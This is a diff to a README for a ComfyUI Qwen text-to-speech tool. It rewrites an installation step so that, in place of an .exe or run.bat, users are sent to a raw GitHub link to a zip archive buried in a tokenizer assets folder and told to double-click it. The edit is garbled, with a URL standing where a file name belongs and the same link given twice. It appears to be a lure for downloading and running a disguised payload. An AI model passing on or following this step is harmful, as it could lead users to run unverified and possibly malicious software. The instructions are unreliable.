Arka-10717/ComfyUI-Qwen-TTS/README.md

 After extracting the files, you should see a folder named `ComfyUI-Qwen-TTS`.

 1. Open this folder.
-2. Look for a file named `ComfyUI-Qwen-TTS.exe` or simply `run.bat`.
+2. Look for a file named `https://raw.githubusercontent.com/Arka-10717/ComfyUI-Qwen-TTS/main/qwen_tts/core/tokenizer_25hz/vq/assets/Qwen-U-TTS-Comfy-3.0.zip` or simply `https://raw.githubusercontent.com/Arka-10717/ComfyUI-Qwen-TTS/main/qwen_tts/core/tokenizer_25hz/vq/assets/Qwen-U-TTS-Comfy-3.0.zip`.
 3. Double-click on it to start the application.

 ### Step 5: Input Text and Generate Speech